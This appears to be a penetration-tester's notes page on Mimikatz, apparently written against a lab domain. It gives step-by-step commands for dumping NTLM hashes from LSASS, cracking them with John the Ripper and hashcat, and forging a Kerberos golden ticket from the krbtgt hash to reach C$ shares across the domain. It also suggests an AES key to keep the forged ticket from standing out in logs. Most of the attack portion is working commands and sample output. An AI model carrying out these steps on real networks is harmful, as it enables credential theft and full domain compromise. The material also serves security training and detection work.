Mimikatz


Last updated 6 months ago

Mimikatz is a very popular and powerful post-exploitation tool, used mainly to dump credentials (NTLM hashes, Kerberos keys and tickets) from Windows hosts inside an Active Directory network.

The idea is to take those credentials and either crack the hashes offline or reuse them directly, for example to forge a golden ticket as shown below.

Run mimikatz

.\mimikatz.exe

Run mimikatz as Administrator

Mimikatz must be started from an elevated (Administrator) prompt. Once inside the interactive console, enable SeDebugPrivilege so it can open and read LSASS memory:

privilege::debug

The expected reply is Privilege '20' OK. Anything else means the prompt is not elevated, or the privilege has been removed from the Administrators group by policy.

Extract NTLM hashes

Run on a domain controller, this patches LSASS in memory and dumps the hash of every domain account (one RID / User / LM / NTLM block per account):

lsadump::lsa /patch

Crack NTLM hashes

Save the dumped entries as user:hash, one per line; both John the Ripper and hashcat accept this layout:

➧ cat mimikatz-ntlm.hashes 
Administrator:2777b7fec870e04dda00cd7260f7bee6
krbtgt:5508500012cc005cf7082a9a89ebdfdf
[...]

Identify hash type

➧ haiti '2777b7fec870e04dda00cd7260f7bee6'
NTLM [HC: 1000] [JtR: nt]

John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT mimikatz-ntlm.hashes

Hashcat

Crack first, then display. --show does not crack anything: it only prints hashes that are already in the potfile from a previous run, so a single command that combines the wordlist attack with --show never runs the attack.

hashcat -a 0 -m 1000 --username mimikatz-ntlm.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 1000 --username --show mimikatz-ntlm.hashes -o cracked-mimikatz-ntlm.hashes
  • -m 1000: NTLM, the mode haiti reported above.

  • --username: tells hashcat that each line starts with a username (or email) followed by a colon.

  • --show: prints the cracked entries from the potfile as USER:HASH:PLAIN; with -o they are written to the given file instead of the terminal.

Golden ticket attack

Extract info about krbtgt (the KDC service account)

A golden ticket is a forged TGT encrypted with the key of the krbtgt account, the secret the KDC uses to protect every TGT in the domain. We first dump the krbtgt hash and the domain SID, then forge a ticket for any user we choose and use it from a new command prompt to reach any machine in the domain.

lsadump::lsa /inject /name:krbtgt

This injects into LSASS and prints the NTLM hash of krbtgt together with the domain SID; both are needed for kerberos::golden. The forged tickets keep working until the krbtgt password is changed twice, because the previous key stays valid after a single rotation.

Generating ticket

kerberos::golden /user: /domain: /sid: /krbtgt: /id:
kerberos::golden /user:Administrator /domain:CONTROLLER.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

  • /sid: is the domain SID, without a trailing RID, exactly as printed by the lsadump command above.

  • /krbtgt: is the krbtgt NTLM hash, which produces an RC4-encrypted ticket. Modern domains issue AES TGTs, so an RC4 TGT stands out in event logs; mimikatz also accepts the AES key instead (/aes256:).

  • /id:500 is the RID of the account the ticket impersonates. The resulting SID is S-1-5-21-<domain>-500, the built-in Administrator, which Microsoft Learn (Security identifiers) describes as follows: "User account for the system administrator. Every computer has a local Administrator account and every domain has a domain Administrator account. The Administrator account is the first account created during operating system setup. The account cannot be deleted, disabled, or locked out, but it can be renamed. By default, the Administrator account is a member of the Administrators group and cannot be removed from that group."

Without /ptt, mimikatz writes the forged ticket to ticket.kirbi in the working directory. Add /ptt to inject it straight into the current logon session, or load the saved file later with kerberos::ptt ticket.kirbi.

Accessing machines

Open a new command prompt from mimikatz. It runs in the same logon session, so it carries the injected golden ticket:

misc::cmd

In that prompt, klist should list a cached krbtgt/CONTROLLER.LOCAL ticket for the chosen user. Then use it over SMB:

dir \\Desktop-1\c$
dir \\Machine2\c$

Use hostnames rather than IP addresses: Kerberos needs a service principal name, and an IP address makes Windows fall back to NTLM, where the forged ticket is never presented.
References

  • GitHub - gentilkiwi/mimikatz: A little tool to play with Windows security (GitHub)
  • Golden Ticket attack and how to mitigate it (Ataque Golden Ticket y cómo mitigarlo), TrustDimension
  • Golden Ticket Attack Explained - MITRE ATT&CK T1558.001 (Picus Security)
  • Security identifiers (Identificadores de seguridad), Microsoft Learn